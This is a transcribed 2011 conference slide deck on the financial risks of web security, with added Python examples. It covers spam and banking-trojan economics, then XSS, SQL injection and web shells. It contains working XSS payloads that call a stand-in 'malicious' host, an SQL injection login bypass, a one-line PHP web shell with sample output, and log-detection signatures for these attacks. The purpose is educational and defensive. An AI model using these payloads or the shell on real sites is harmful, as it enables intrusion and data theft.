Martin Lee CISSP CEng and Dr. Les Pritchard CITP discuss the Costs and Financial Risks of Web Security at Symantec Vision 2011
Costs and Financial Risks of Web Security
Martin Lee CISSP CEng
Dr. Les Pritchard CITP
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Where the Threats Come From
Insider threats: mostly accidental data deletion.
Acts of God: fire, flood, volcanoes!
Malicious outsiders (cybercriminals): malware, banking trojans.
How the Bad Guys Make Money
Anyone’s Computer or Your Computer?
Botnets: compromising any computer. Denial of service attacks, sending spam, stealing data.
Banking trojans: compromising any computer. Internet bank robbery.
Targeted attacks: compromising specific systems. Stealing high value data.
Making Money From Botnets – Sending Spam
Traffic analysis of rogue website
26 days, 350 million spams, 28 sales
But, when scaled up
~$7000 in sales per day
~$2M per year
Source :
C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008
(http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)
Making Money From Botnets – Denial of Service
Attacks can reach 100 Gbit/s of attack traffic.
Estimated UK losses $3bn/yr.
Making Money From Banking Trojans
Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/
Banking Trojans – Zeus Man-in-Browser Attack
Malware waits for you to log in to internet banking, then issues payments on your behalf to money mules.
Banking Trojans – Zeus Man-in-Browser Attack
Malware intercepts the data sent back by the bank, removes its own transfers and adjusts the balance, so you see what you expect to see.
Distributing Web Malware
Gumblar lifecycle (diagram): the hacker steals a website owner’s login and uses it to add an XSS exploit to an otherwise unaffected website. When a victim visits that website, the page forwards them to an exploit/malware host that the hacker controls, which installs malware on the victim’s machine. The malware steals further login details, and the cycle starts again.
Uploading web malware to your website by stealing your login details.
Malware on Legitimate Domains
(Chart) Malicious domains lifecycle: % remaining active over time, 0 to 180 days, “old” domains versus “new” domains.
Over time more than 80% of malicious domains are “old” domains.
Employee Browsing Habits
Browsing Habits Outside of the Office
(Chart) % of web blocks plotted against % of users, mobile users versus office users.
Distributing Web Malware – Advertising Services
Subvert a legitimate website (diagram): the adverts on a web page are sold by the site’s sales team, sold on by a reseller and resold further; at the end of that chain an “advertiser” may be a malware distributor.
Fake AV
Fake AV – do the maths
1 million products sold @ $39.95 = $39.95 million
minus $8.2 million fine
= $31.75 million profit!
Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html
Attacking Your Website
My Website – XSS Example
www.example.com/index.php?page=cat&category=1&PHPSESSID=
My Website – XSS Example
www.example.com/index.php?page=cat&category=1&PHPSESSID=
becomes
www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D
Attack JS –
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
URL encode it, replace ‘category’ value
My Website – XSS Example
Attacker can execute whatever they like:
Exploit – <script src="http://www.malicious.com/attack.js"></script>
Redirect – window.location.href = "http://www.malicious.com/"
Why not? – document.product.price = "0.01"
XSS Example – Click that link
Email containing link
Embed link in discussion page
(Form mockup: a web page with an “Enter text” box and a Submit button.) The posted comment reads:
I agree. <img src="/images/smiley.gif" onload="document.location='http://malicious/'">
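The reflected XSS on the previous slides (the attack JS URL-encoded into the “category” parameter) and the stored variant above (an <img onload> in a discussion post) both come down to the same bug: untrusted input copied into HTML without validation or output encoding. The following Python is an added example, not code from the presentation; the two renderers are hypothetical stand-ins for the slides’ index.php and discussion page. It takes the slides’ own payloads, shows the URL-encoding step, renders them through a vulnerable and a hardened version of each page, and uses an HTML parser to check whether anything executable survived.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# Payloads copied from the slides: one reflected via the "category" parameter,
# one stored via a discussion post.
REFLECTED_PAYLOAD = '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
STORED_PAYLOAD = ('I agree. <img src="/images/smiley.gif" '
                  "onload=\"document.location='http://malicious/'\">")
# The slide's (truncated) URL-encoded form of the attack string.
SLIDE_ENCODED_PREFIX = ("%3E%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%53%74%72"
                        "%69%6E%67%2E%66%72%6F%6D")


def encode_for_url(payload: str) -> str:
    """The slide's step 2: URL-encode the attack JS so it can replace the 'category' value."""
    return quote(payload, safe="")


def decode_url(encoded: str) -> str:
    """What the web server sees once it has decoded the query string."""
    return unquote(encoded)


def render_category_vulnerable(category: str) -> str:
    """Hypothetical index.php: echoes the raw parameter into an attribute and the body."""
    return f'<a href="index.php?page=cat&category={category}">Category {category}</a>'


def render_category_hardened(category: str) -> str:
    """Validate on input (a category id is a number) and HTML-encode on output."""
    if not category.isdigit():
        raise ValueError("category must be a positive integer")
    safe = html.escape(category, quote=True)
    return f'<a href="index.php?page=cat&category={safe}">Category {safe}</a>'


def render_comment_vulnerable(comment: str) -> str:
    """Hypothetical discussion page: prints the post verbatim (stored XSS)."""
    return f"<p>{comment}</p>"


def render_comment_hardened(comment: str) -> str:
    """Encode on output: the <img onload=...> arrives as text, not as markup."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


class _ActiveContentDetector(HTMLParser):
    """Flags any <script> element or on* event-handler attribute in parsed markup."""

    def __init__(self) -> None:
        super().__init__()
        self.active = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.startswith("on") for name, _ in attrs):
            self.active = True


def has_active_content(markup: str) -> bool:
    """True if a browser would execute something when rendering this markup."""
    detector = _ActiveContentDetector()
    detector.feed(markup)
    detector.close()
    return detector.active


if __name__ == "__main__":
    encoded = encode_for_url(REFLECTED_PAYLOAD)
    print("attacker URL: index.php?page=cat&category=" + encoded)
    print("vulnerable page executes payload:",
          has_active_content(render_category_vulnerable(decode_url(encoded))))
    print("hardened discussion page executes payload:",
          has_active_content(render_comment_hardened(STORED_PAYLOAD)))
```

The parser-based check matters more than it looks: a naive substring test for `onload=` would still match the escaped output, because encoding turns `<img ... onload="...">` into `&lt;img ... onload=&quot;...&quot;&gt;`, which is inert text but contains the same characters. Validation alone (reject a non-numeric category) is not enough either, since the discussion post legitimately contains free text; output encoding is the control that covers both.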
SQL Injection – “Little Bobby Tables”
Source: XKCD Comic - http://xkcd.com/327/
My Website – SQL Injection Example
SQL injection:
Select * from users where username = "$input" and password = md5("$password");
$input = 'admin"; -- '
Select * from users where username = "admin"; -- ... everything after the comment marker is ignored, including the password check.
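To show the bypass end to end, the following Python is an added example (not code from the presentation) that runs the slide’s query against a constructed in-memory SQLite table. The injected username mirrors the slide’s `admin"; -- ` but uses SQLite’s single-quote string delimiter; the vulnerable login splices the input into the SQL text exactly as the slide does, and the parameterised login beside it passes the same input as a bound value. The demo account and password are made up.

```python
import hashlib
import sqlite3

# Constructed demo credentials; nothing from the slides.
DEMO_USER, DEMO_PASSWORD = "admin", "correct horse"

# The slide's payload written for SQLite's single-quoted strings: the quote closes
# the literal and "--" comments out the rest of the statement, password check included.
INJECTED_USERNAME = "admin' -- "


def md5_hex(text: str) -> str:
    """The slide's query hashes passwords with md5(); unsalted MD5 is itself weak and is kept only to match the slide."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """One-row users table so the queries below have something to return."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (DEMO_USER, md5_hex(DEMO_PASSWORD)))
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The slide's query with the user's input spliced straight into the SQL text."""
    return (f"SELECT * FROM users WHERE username = '{username}' "
            f"AND password = '{md5_hex(password)}'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Returns True when the spliced query finds a row, whatever the password was."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the driver hands the username to SQLite as data, never as SQL."""
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, md5_hex(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(INJECTED_USERNAME, "wrong"))
    print("vulnerable login with injected username:", login_vulnerable(db, INJECTED_USERNAME, "wrong"))
    print("parameterised login with injected username:", login_parameterised(db, INJECTED_USERNAME, "wrong"))
```

The printed query makes the failure visible: after splicing, the statement ends with `username = 'admin' --` and the `AND password = '...'` clause is now inside a comment, so the attacker is logged in as admin without knowing any password. The parameterised version compares the literal string `admin' -- ` to the username column and finds nothing.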
My Website – SQL Injection Example
How about a file like this?
<? system($_REQUEST['cmd']); ?>
My Website – Now completely at mercy of attacker
Request: http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C (cmd is "ls -l", URL-encoded as %6C%73%20%2D%6C)
Response:
total 36
-rw-rw-r-- 1 martin martin  191 Nov 27  2003 categories.php
drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc
-rw-rw-r-- 1 martin martin  543 Mar 29 14:54 index.old
-rw-r--r-- 1 martin martin  124 Mar 29 15:03 index.php
-rw-rw-r-- 1 martin martin  537 Mar 29 14:41 index.php~
-rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php
-rw-rw-r-- 1 martin martin 1924 Nov 28  2003 product_image.php~
-rw-rw-r-- 1 martin martin  189 Nov 27  2003 products.php
-rw-r--r-- 1 martin martin   31 Mar 29 15:04 shell.php
Vulnerable Websites
Skilled attackers can easily find vulnerabilities.
Others can use a list of vulnerable websites.
How You Lose Money
Data Breach Losses
• Ponemon Institute & Symantec Research
– Average cost per data breach $7.2 million.
– $214 per breached record.
– 31% of breaches are malicious or criminal attack.
– Malicious attacks cost more: $318 per breached record.
See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01
Calculate your risk: http://databreachcalculator.com/
(Chart) Symantec SMB Survey – What do SMBs suffer? Percentage of respondents (0% to 60%) for each of: environment downtime, corporate data theft, customer or employee PI theft, customer financial information theft, intellectual property theft.
Protecting Yourself.
Know Your Assets, Know Attack Vectors
Layers of Protection Provide Maximum Detection
Test & Monitor Your Web Services
Find and fix vulnerabilities in your web services.
Monitor logs to identify attacks, then block the attacker.
You don’t need to be perfect, just better than your competitors.
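“Monitor logs to identify attacks, block attacker” is easy to say and worth making concrete. The following Python is an added example, not something from the presentation or from any Symantec product: it scans constructed Apache combined-format access log lines (made up for this example, using the reflected XSS, SQL injection and shell.php payloads shown earlier in the deck) for the request patterns those attacks leave behind, and turns repeat offenders into a block list. The signatures and the two-hit threshold are illustrative choices, not a vendor rule set.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed log lines (not real traffic). 203.0.113.9 browses normally;
# 198.51.100.7 sends the deck's XSS, SQL injection and web-shell requests.
SAMPLE_LOG = """\
203.0.113.9 - - [29/Mar/2011:15:01:12 +0100] "GET /index.php?page=cat&category=1 HTTP/1.1" 200 2310
198.51.100.7 - - [29/Mar/2011:15:02:44 +0100] "GET /index.php?page=cat&category=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1" 200 2410
198.51.100.7 - - [29/Mar/2011:15:03:10 +0100] "POST /login.php?username=admin%27%3B%20--%20 HTTP/1.1" 302 0
198.51.100.7 - - [29/Mar/2011:15:04:51 +0100] "GET /images/shell.php?cmd=%6C%73%20%2D%6C HTTP/1.1" 200 640
203.0.113.9 - - [29/Mar/2011:15:05:02 +0100] "GET /images/smiley.gif HTTP/1.1" 200 1182
"""

# Apache combined format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Illustrative signatures, matched against the URL-decoded request path.
SIGNATURES = [
    ("xss", re.compile(r"<\s*script|on(load|error|click)\s*=", re.I)),
    ("sqli", re.compile(r"['\"]\s*;?\s*--|\bunion\s+select\b", re.I)),
    ("webshell", re.compile(r"\.php\?.*\bcmd=", re.I)),
]


def fully_decode(path: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double encoding (%2527 for a quote) cannot hide a payload."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request(path: str) -> list:
    """Names of every signature that fires on the decoded request path."""
    decoded = fully_decode(path)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text: str) -> list:
    """(client IP, raw path, matched signatures) for each suspicious line."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        hits = classify_request(match["path"])
        if hits:
            findings.append((match["ip"], match["path"], hits))
    return findings


def attackers_to_block(findings: list, threshold: int = 2) -> list:
    """Clients with at least `threshold` suspicious requests, ready for a firewall rule."""
    counts = Counter(ip for ip, _, _ in findings)
    return sorted(ip for ip, count in counts.items() if count >= threshold)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, path, hits in found:
        print(f"{ip}  {','.join(hits):10}  {fully_decode(path)}")
    print("block:", attackers_to_block(found))
```

Two details carry the weight here. Decoding before matching is what lets the shell.php request, logged as `cmd=%6C%73%20%2D%6C`, show up as `cmd=ls -l`; matching on the raw line would miss it, and attackers encode precisely because many filters do not decode. And because status codes are logged, the 200 on the shell.php line tells you the script exists and ran, which is the point at which the website is “completely at the mercy of the attacker” and a block rule is the least of the work.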
Thank you!
Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Martin Lee
Martin_lee@symantec.com
+44 1452 627 042